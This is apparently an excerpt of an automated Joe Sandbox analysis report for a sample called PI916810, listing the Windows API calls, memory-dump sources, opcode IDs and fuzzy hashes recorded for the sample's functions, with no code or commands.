                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                            • Opcode ID: 92dfbc419fc0ae1c4e30027706a82824e9b5a079a6ff687534298f9cc59ad7fd
                                                                                                                                                                            • Instruction ID: 6cbd16b48b65b6ca750a547921a3aa3af6b24c38dcb005f0d78b3673ac87e5d8
                                                                                                                                                                            • Opcode Fuzzy Hash: 92dfbc419fc0ae1c4e30027706a82824e9b5a079a6ff687534298f9cc59ad7fd
                                                                                                                                                                            • Instruction Fuzzy Hash: 75316E71A00B0AAFCB18DF2DC48465DB7B1FF88314F14862AD81993750E735BD50DB96
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                            • Instruction ID: 8c077a08ea929caf4351a45eb97bf061d5b5784a7ef92551e493b7b88b48f0ee
                                                                                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                            • Instruction Fuzzy Hash: B031F370A10105DFC7A8EF48C48096EF7A6FF59300B248AA6E909CB751D734EDC5CB88
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                            • Opcode ID: 65dbc99adb3a0ed61403776b70066b545126102f7732e5109d7da8cd93a28486
                                                                                                                                                                            • Instruction ID: c140ed07e3da9b4259a15c37091adf7e0a7e8a408b3ffbedc1d5e94a43699c5b
                                                                                                                                                                            • Opcode Fuzzy Hash: 65dbc99adb3a0ed61403776b70066b545126102f7732e5109d7da8cd93a28486
                                                                                                                                                                            • Instruction Fuzzy Hash: EA4106745043518FDB24DF14C484B1ABBE1BF45318F0988AEE8899B762D33AE895CF5B
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4104443479-0
                                                                                                                                                                            • Opcode ID: cbc43187a56acead02c346e58e0f219c2927142ee1629b1a5ec41ade2bd355ee
                                                                                                                                                                            • Instruction ID: eddef865e5131e23ae74ce3410a66b3ded4335c775e773c5e5c2194ed972cbcd
                                                                                                                                                                            • Opcode Fuzzy Hash: cbc43187a56acead02c346e58e0f219c2927142ee1629b1a5ec41ade2bd355ee
                                                                                                                                                                            • Instruction Fuzzy Hash: 0921AE30A00A18EBDF109F52E8856AE7FB8FF11350F25C86FE485D1410EB7994A1EB4A
APIs
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: _wcscmp
• String ID:
• API String ID: 856254489-0
• Opcode ID: ef692a0cfe230a34af82c117126661b03c68ec34779b21d73db04b42557bbf8b
• Instruction ID: 6892ae42e7d1ed272da9c20bad017d6bfbd4b5fc4eb6313b88a7a90589d8f096
• Opcode Fuzzy Hash: ef692a0cfe230a34af82c117126661b03c68ec34779b21d73db04b42557bbf8b
• Instruction Fuzzy Hash: A211C3319001199BCF14EBAADCC18EEB778AF51365F10812BE811A71A0F6349D05CB9A
APIs
  • Part of subcall function 00464D13: FreeLibrary.KERNEL32(00000000,?), ref: 00464D4D
  • Part of subcall function 0048548B: __wfsopen.LIBCMT ref: 00485496
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00464F6F
  • Part of subcall function 00464CC8: FreeLibrary.KERNEL32(00000000), ref: 00464D02
  • Part of subcall function 00464DD0: _memmove.LIBCMT ref: 00464E1A
Similarity
• API ID: Library$Free$Load__wfsopen_memmove
• String ID:
• API String ID: 1396898556-0
• Opcode ID: a0a06703168afe9b7e96f63af4d312a3ef4203e2534b7b71595084f58bd14f0f
• Instruction ID: 349326d0914f2f2a546d4dbda58cd4c7fecada66727a76ed5a4466608a660724
• Opcode Fuzzy Hash: a0a06703168afe9b7e96f63af4d312a3ef4203e2534b7b71595084f58bd14f0f
• Instruction Fuzzy Hash: 6D11E731A00609AACF14BF72DC02FAE77A49F84705F10842FF541AB2C1EA799A05975A
APIs
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: 1c85b7c5740cf3dd7bd2ee465504dba4bffc30145a4a0183d62c0a2f41e2c445
• Instruction ID: 6fe64ea80f88a0cabda1fc10615bd9be4f34817be2ab0cc55994d70900a1f73f
• Opcode Fuzzy Hash: 1c85b7c5740cf3dd7bd2ee465504dba4bffc30145a4a0183d62c0a2f41e2c445
• Instruction Fuzzy Hash: 3021F0B4508341CFCB24DF14C844A1ABBE4BF85314F04896EE88A67761E73AE859CB5B
APIs
• ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00465807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00465D76
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 70ee86c230223b52458438636ba2a46194284291a71cf9316e14fcda94fe37b1
• Instruction ID: 050ea2d90b17b323437eee2bcd7ec16f6934b44980b4a252c1575d77ae63dbe1
• Opcode Fuzzy Hash: 70ee86c230223b52458438636ba2a46194284291a71cf9316e14fcda94fe37b1
• Instruction Fuzzy Hash: FB113A31200B059FD3308F15C484B67B7E5EF45750F10C92EE5AA86A90E778E945CB65
APIs
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
• Instruction ID: 8e269bc719bce3da0455fec78608cc20dabb59edc13a828abdadbc59befd6d64
• Opcode Fuzzy Hash: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
• Instruction Fuzzy Hash: C1017175600541ABC305EB6AC841D2AFBA9FF86314714815AE815C7702DB35EC21CBE5
APIs
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: afa7022badd1ca320fcd41164b148bf7cbd533a7763c9ccd7f4a3c956b31c337
• Instruction ID: ac9511ff00fea7fd78178b0ca2eb517dffd4cc4521d9de08cd493495679f0494
• Opcode Fuzzy Hash: afa7022badd1ca320fcd41164b148bf7cbd533a7763c9ccd7f4a3c956b31c337
• Instruction Fuzzy Hash: 3001D672214701AED3246B29CC06F67BB98EB44764F10892FFA5ACB291EA75E4408759
APIs
• __lock_file.LIBCMT ref: 00484AD6
  • Part of subcall function 00488D68: __getptd_noexit.LIBCMT ref: 00488D68
Similarity
• API ID: __getptd_noexit__lock_file
• String ID:
• API String ID: 2597487223-0
• Opcode ID: f616c9884b79e56840eab3217dc5d5fa10b7561b6fb148123741eeb79f7548fd
• Instruction ID: ccaed4ce8ad700d43a18559a07e60d059c424acd3d18d9d8c39822da44d3c6c2
• Opcode Fuzzy Hash: f616c9884b79e56840eab3217dc5d5fa10b7561b6fb148123741eeb79f7548fd
• Instruction Fuzzy Hash: 5CF0A43194020A9BDF61BF768C0639F76A1AF80329F448D1EF8149A1D1DB7C8951DF59
APIs
• FreeLibrary.KERNEL32(?,?,005262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00464FDE
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3664257935-0
                                                                                                                                                                            • Opcode ID: 7f44aff19146cd0e71b0b0f86a98d9014e04597a04b79840bc32d16417eb9f5b
                                                                                                                                                                            • Instruction ID: 1afc70cd5a0f134b5658d8cc4ca108dfdd64e1c2794b3fa4a30e3bb422ee45b6
                                                                                                                                                                            • Opcode Fuzzy Hash: 7f44aff19146cd0e71b0b0f86a98d9014e04597a04b79840bc32d16417eb9f5b
                                                                                                                                                                            • Instruction Fuzzy Hash: DEF039B1105712CFCB389F64E494817BBF1BF443293208A7FE1D682A10E779A844DF4A
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004809F4
  • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: LongNamePath_memmove
• String ID:
• API String ID: 2514874351-0
• Opcode ID: 13a5c6ddae6f50d738935408170488b8ca3d607a99fecd2c6af27be944780bdf
• Instruction ID: b4a6f5dd978c65ff8f7b72a9715d6ed39e1d9650c60597de41bb9e30be432060
• Opcode Fuzzy Hash: 13a5c6ddae6f50d738935408170488b8ca3d607a99fecd2c6af27be944780bdf
• Instruction Fuzzy Hash: DBE07D3290022857C720D2589C05FFA77EDDF88394F0001F6FD0CC7205E964AC818694
APIs
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
• Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
• Instruction ID: a326d414ae9c1a62e75c0f741e38236df5c62a11d3d65417a6573f596a03b39e
• Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
• Instruction Fuzzy Hash: 3AE092B0104B005FEB749A24D815BE373E0BB06315F04081EF2DA83341EF667C41875D
APIs
• SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0049E16B,?,?,00000000), ref: 00465DBF
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: a9f5f12cba3d752d87cc223146b9630becf5f76c090f8f5e9ce8d77ab5c97467
• Instruction ID: 69e4124741fb59f94e65bced6e52fdd4c42876bf9c14dbe17aaabf874543b263
• Opcode Fuzzy Hash: a9f5f12cba3d752d87cc223146b9630becf5f76c090f8f5e9ce8d77ab5c97467
• Instruction Fuzzy Hash: 73D0C77464020CBFE710DB80DC46FA9B77CD745711F100194FD0456290D6B27E548795
APIs
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
• Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
• Instruction ID: 9877bb735b6643e81d9f2fb83f0f5362524793e2b268453ee25f0832193e4a93
• Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
• Instruction Fuzzy Hash: 2AB0927684020C77DF022E82EC02B593B199B40A78F808021FB0C18162A677A6A09689
APIs
• GetLastError.KERNEL32(00000002,00000000), ref: 004CD46A
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 2bb14a9223b9ac77e4b1bac1c3e73e4c9550877e3aabc8bcd1a20d3621c7edcc
• Instruction ID: dc28d2eac1367144410f469f361efa08168d01b6dfb256e6cfbb072df9891bd8
• Opcode Fuzzy Hash: 2bb14a9223b9ac77e4b1bac1c3e73e4c9550877e3aabc8bcd1a20d3621c7edcc
• Instruction Fuzzy Hash: 1A7162346043018FC754EF65C491F6AB7E0AF88318F04452EF9968B3A1DB78ED09CB5A
APIs
• Sleep.KERNELBASE(000001F4), ref: 010FD981
Memory Dump Source
• Source File: 00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 010FB000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10fb000_PI916810.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction ID: 8342a9c57f0e38c12d8e82de3cd33e1773cf82dba8de628dce89ce41ff1bd6ba
• Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction Fuzzy Hash: 2AE0E67494420DDFDB00EFF4D9496DE7FB4EF04301F100165FD05D2281D6309D508A62
APIs
  • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 004ECE50
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004ECE91
• GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 004ECED6
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004ECF00
• SendMessageW.USER32 ref: 004ECF29
• _wcsncpy.LIBCMT ref: 004ECFA1
• GetKeyState.USER32(00000011), ref: 004ECFC2
• GetKeyState.USER32(00000009), ref: 004ECFCF
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004ECFE5
• GetKeyState.USER32(00000010), ref: 004ECFEF
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004ED018
• SendMessageW.USER32 ref: 004ED03F
• SendMessageW.USER32(?,00001030,?,004EB602), ref: 004ED145
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 004ED15B
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 004ED16E
• SetCapture.USER32(?), ref: 004ED177
• ClientToScreen.USER32(?,?), ref: 004ED1DC
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 004ED1E9
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004ED203
                                                                                                                                                                            • ReleaseCapture.USER32 ref: 004ED20E
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004ED248
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004ED255
                                                                                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 004ED2B1
                                                                                                                                                                            • SendMessageW.USER32 ref: 004ED2DF
                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004ED31C
                                                                                                                                                                            • SendMessageW.USER32 ref: 004ED34B
                                                                                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 004ED36C
                                                                                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 004ED37B
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004ED39B
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004ED3A8
                                                                                                                                                                            • GetParent.USER32(?), ref: 004ED3C8
                                                                                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 004ED431
                                                                                                                                                                            • SendMessageW.USER32 ref: 004ED462
                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 004ED4C0
                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 004ED4F0
                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004ED51A
                                                                                                                                                                            • SendMessageW.USER32 ref: 004ED53D
                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 004ED58F
                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 004ED5C3
                                                                                                                                                                              • Part of subcall function 004625DB: GetWindowLongW.USER32(?,000000EB), ref: 004625EC
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004ED65F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                                            • String ID: @GUI_DRAGID$F$prR
                                                                                                                                                                            • API String ID: 3977979337-3452754240
                                                                                                                                                                            • Opcode ID: e1b8da45ee36ccc1ea2b3b157ba4804b2c5fa772616d17124aa6946d75ad4aa3
                                                                                                                                                                            • Instruction ID: 80f6e9c54f076fb7678184f78a3c0a6e6ac563eb3d06af4665864d12aa850ccb
                                                                                                                                                                            • Opcode Fuzzy Hash: e1b8da45ee36ccc1ea2b3b157ba4804b2c5fa772616d17124aa6946d75ad4aa3
                                                                                                                                                                            • Instruction Fuzzy Hash: 4042BC30604280AFC725CF29C884FABBBE5FF49315F14052EF6958B3A1C7359846CB9A
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004E873F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID: %d/%02d/%02d
                                                                                                                                                                            • API String ID: 3850602802-328681919
                                                                                                                                                                            • Opcode ID: 9ee23ebfb2f9abcc9c0d555a04856e6f8aea0ce1aa1da225bb96c9368250b287
                                                                                                                                                                            • Instruction ID: 4f5a19f27e726066f36c393957073ea541a704cd44cd6f9c88e32480f17c8423
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ee23ebfb2f9abcc9c0d555a04856e6f8aea0ce1aa1da225bb96c9368250b287
                                                                                                                                                                            • Instruction Fuzzy Hash: A412D170500284ABEF259F26CC89FAF7BB4EF45311F10416EF919EA2A1DF788945CB19
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove$_memset
                                                                                                                                                                            • String ID: 0wQ$DEFINE$OaG$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                                                                                                            • API String ID: 1357608183-1737681961
                                                                                                                                                                            • Opcode ID: f5b015041815f126837a4a70679dfe8bb5f25db7c5d2b663159009e9d3979912
                                                                                                                                                                            • Instruction ID: 0a23a22fa6a4a2c79f621f736089c81578f99a04eac009aa098c24d78aa8f53c
                                                                                                                                                                            • Opcode Fuzzy Hash: f5b015041815f126837a4a70679dfe8bb5f25db7c5d2b663159009e9d3979912
                                                                                                                                                                            • Instruction Fuzzy Hash: 7493A271A00215DBDB24CF59C8817EEB7B1FF48310F65816BE949AB381E7789D82CB58
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetForegroundWindow.USER32(00000000,?), ref: 00464A3D
                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0049DA8E
                                                                                                                                                                            • IsIconic.USER32(?), ref: 0049DA97
                                                                                                                                                                            • ShowWindow.USER32(?,00000009), ref: 0049DAA4
                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0049DAAE
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0049DAC4
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0049DACB
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0049DAD7
                                                                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0049DAE8
                                                                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0049DAF0
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 0049DAF8
                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0049DAFB
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0049DB10
                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0049DB1B
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0049DB25
